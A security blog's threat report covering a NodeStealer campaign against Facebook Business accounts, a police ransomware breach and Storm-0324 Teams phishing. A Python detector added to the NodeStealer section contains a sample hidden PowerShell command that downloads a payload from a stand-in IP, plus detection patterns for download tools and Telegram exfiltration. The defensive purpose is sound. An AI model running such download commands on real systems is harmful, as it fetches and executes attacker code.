Craig Pepper
September 18, 2023

Threat Report 18.09.23

NodeStealer Malware Expands Attack Scope to Target Facebook Business Accounts Across Multiple Browsers

A persistent cyber campaign has set its sights on Facebook Business accounts, using deceptive messages to harvest user credentials. This campaign employs a variant of NodeStealer, a Python-based malware with a history of compromising Facebook, Gmail, and Outlook accounts.

Netskope Threat Labs researcher Jan Michael Alcantara sheds light on this ongoing threat. The attacks primarily affect Southern Europe and North America, with the manufacturing, services, and technology sectors being the most prominent targets.

NodeStealer originally emerged as a JavaScript malware known for stealing cookies and passwords from web browsers. However, the latest iteration of this malware is Python-based, with select versions also geared toward cryptocurrency theft. These findings from Netskope suggest that Vietnamese threat actors are likely behind this campaign and have adopted tactics from other adversaries with similar objectives.

Guardio Labs recently uncovered a scheme where fraudulent messages via Facebook Messenger deliver ZIP or RAR archive files containing the NodeStealer malware. These archives appear to contain images of defective products, tricking Facebook business page owners or admins into downloading the malicious payload.

Once executed, the payload opens the Chrome web browser and covertly initiates a PowerShell command to retrieve additional malicious components, including the Python interpreter and NodeStealer malware. Beyond stealing credentials and cookies from various web browsers, this malware also gathers system metadata and exfiltrates the information over Telegram.

Alcantara points out that this new NodeStealer variant is more sophisticated, using batch files to download and execute Python scripts, expanding its reach to multiple browsers and websites. This campaign could potentially serve as a stepping stone for more targeted attacks in the future. Attackers armed with stolen Facebook credentials can misuse them to take over accounts and conduct fraudulent transactions using legitimate business pages.
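The execution chain described above (archive-dropped batch file, hidden PowerShell download, a Python interpreter run from a user-writable folder, exfiltration over Telegram) is something a defender can score on endpoint telemetry. The following detector is an added example, not code from this report or from Netskope; the event field names, file paths, the 203.0.113.5 address and the Telegram Bot API host are constructed assumptions rather than indicators from the campaign.

```python
# Added example (not from the original post): score the NodeStealer-style
# chain over Sysmon-like process-create and network-connect events.
# All paths, pids and hosts below are constructed for illustration.
import re

DOWNLOAD_RE = re.compile(r"invoke-webrequest|downloadfile|curl|wget|\biwr\b", re.I)
USER_DIR_RE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\", re.I)
EXFIL_HOSTS = {"api.telegram.org"}  # assumption: Telegram Bot API used for exfil

# Constructed telemetry: process creates carry image/cmdline and ppid links each
# child to the cmd.exe that ran the batch file; the last record is a network connect.
EVENTS = [
    {"pid": 100, "ppid": 50, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\photos\run.bat"'},
    {"pid": 101, "ppid": 100, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe"},
    {"pid": 102, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c Invoke-WebRequest -Uri http://203.0.113.5/py.zip -OutFile py.zip"},
    {"pid": 103, "ppid": 100, "image": r"C:\Users\u\AppData\Local\Temp\py\python.exe",
     "cmdline": "python.exe main.py"},
    {"pid": 103, "dest": "api.telegram.org", "dport": 443},
]

def chain_stages(events):
    """Return {root_pid: set of observed stage names} for each cmd.exe running a .bat."""
    roots = {e["pid"] for e in events if "cmdline" in e
             and e["image"].lower().endswith("\\cmd.exe")
             and re.search(r"\.bat\b", e["cmdline"], re.I)}
    stages = {r: {"batch"} for r in roots}
    python_pids = {}  # pid of a suspicious python.exe -> its batch-file root
    for e in events:
        root = e.get("ppid")
        if root in stages and "image" in e:
            img = e["image"].lower()
            if img.endswith("\\powershell.exe") and DOWNLOAD_RE.search(e["cmdline"]):
                stages[root].add("ps_download")       # hidden download stage
            elif img.endswith("\\python.exe") and USER_DIR_RE.search(e["image"]):
                stages[root].add("user_python")       # interpreter dropped by the script
                python_pids[e["pid"]] = root
    for e in events:  # network connects are keyed by pid, not ppid
        root = python_pids.get(e.get("pid"))
        if root is not None and e.get("dest") in EXFIL_HOSTS:
            stages[root].add("telegram_exfil")
    return stages

def alerts(events, min_stages=3):
    """Root pids whose chain shows at least min_stages distinct stages."""
    return sorted(pid for pid, s in chain_stages(events).items() if len(s) >= min_stages)
```

Requiring several stages rather than any single one keeps ordinary batch scripts that merely call PowerShell from alerting, while the full chain still scores.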

Greater Manchester Police Falls Victim to Ransomware Attack

The Greater Manchester police force has recently become the target of a well-established cyberattack method known as ransomware. On Thursday, it was disclosed that a breach had occurred through a third-party supplier who held information related to the police force's employees.

This breach exposed sensitive information, including details from officers' name badges, such as their ranks, photographs, and serial numbers. The incident is reminiscent of a similar attack on the Metropolitan police, which was announced in August, where data belonging to officers and staff was compromised through the same supplier.

Unfortunately, the Greater Manchester police force is not the only entity affected by ransomware attacks in the UK this year. Other organizations, both public and private, have fallen victim to such attacks, including the Royal Mail, outsourcing firm Capita, and the Barts Health NHS trust. Even The Guardian experienced a ransomware attack last year.

Microsoft Alerts About Phishing Campaign Targeting Corporations Using Teams Messages

Microsoft has issued a warning regarding a recently identified phishing campaign aimed at infiltrating corporate networks by exploiting Microsoft Teams messages as bait. This campaign is being tracked by Microsoft's Threat Intelligence team under the name Storm-0324, also known as TA543 and Sagrid.

Starting in July 2023, Storm-0324 was observed distributing malicious payloads by employing an open-source tool to send phishing lures through Microsoft Teams chats. This marks a departure from the traditional email-based methods used for initial access in cyberattacks.

Storm-0324 operates as a payload distributor within the cybercriminal landscape, facilitating the spread of various malicious payloads. These payloads include downloaders, banking trojans, ransomware, and modular toolkits like Nymaim, Gozi, TrickBot, IcedID, Gootkit, Dridex, Sage, GandCrab, and JSSLoader.

Past attack sequences orchestrated by this actor have used decoy email messages related to invoices and payments to trick users into downloading ZIP archive files hosted on SharePoint. These files were designed to distribute JSSLoader, a malware loader capable of profiling infected machines and loading additional malicious components.

The actor behind Storm-0324 employs highly evasive email chains, utilizing traffic distribution systems (TDS) such as BlackTDS and Keitaro. These systems let the attackers identify and filter incoming traffic, screening out requests from certain IP ranges, such as those belonging to malware sandboxes, while redirecting genuine victims to malicious download sites.

The malware introduced through these attacks ultimately allows the ransomware-as-a-service (RaaS) actor Sangria Tempest (also known as Carbon Spider, ELBRUS, and FIN7) to carry out post-exploitation actions and deploy file-encrypting malware.

As of July 2023, the phishing lures are distributed via Microsoft Teams messages containing malicious links leading to ZIP files hosted on SharePoint. This is achieved by exploiting an issue first highlighted in June 2023, using an open-source tool called TeamsPhisher.

It's important to note that a similar technique was previously used by the Russian nation-state actor APT29 (also known as Midnight Blizzard) in attacks on approximately 40 organizations worldwide in May 2023.

Microsoft has taken several security measures to counter this threat, including suspending accounts and tenants associated with fraudulent activity. Detecting and addressing Storm-0324 activity can prevent more severe follow-on attacks, such as ransomware incidents.

This disclosure comes as Kaspersky provides insights into the tactics, techniques, and procedures of the ransomware group known as Cuba (also known as COLDDRAW and Tropical Scorpius). This group employs the double extortion model and has recently been associated with an alias called "V Is Vendetta." The group utilizes various tools and techniques, including the exploitation of vulnerabilities like ProxyLogon, ProxyShell, ZeroLogon, and Veeam Backup & Replication software flaws.

Ransomware attacks have surged in 2023, with the U.K. National Cyber Security Centre (NCSC) and National Crime Agency (NCA) highlighting that many are reliant on a complex supply chain. They emphasize the importance of cyber hygiene in preventing these opportunistic attacks.
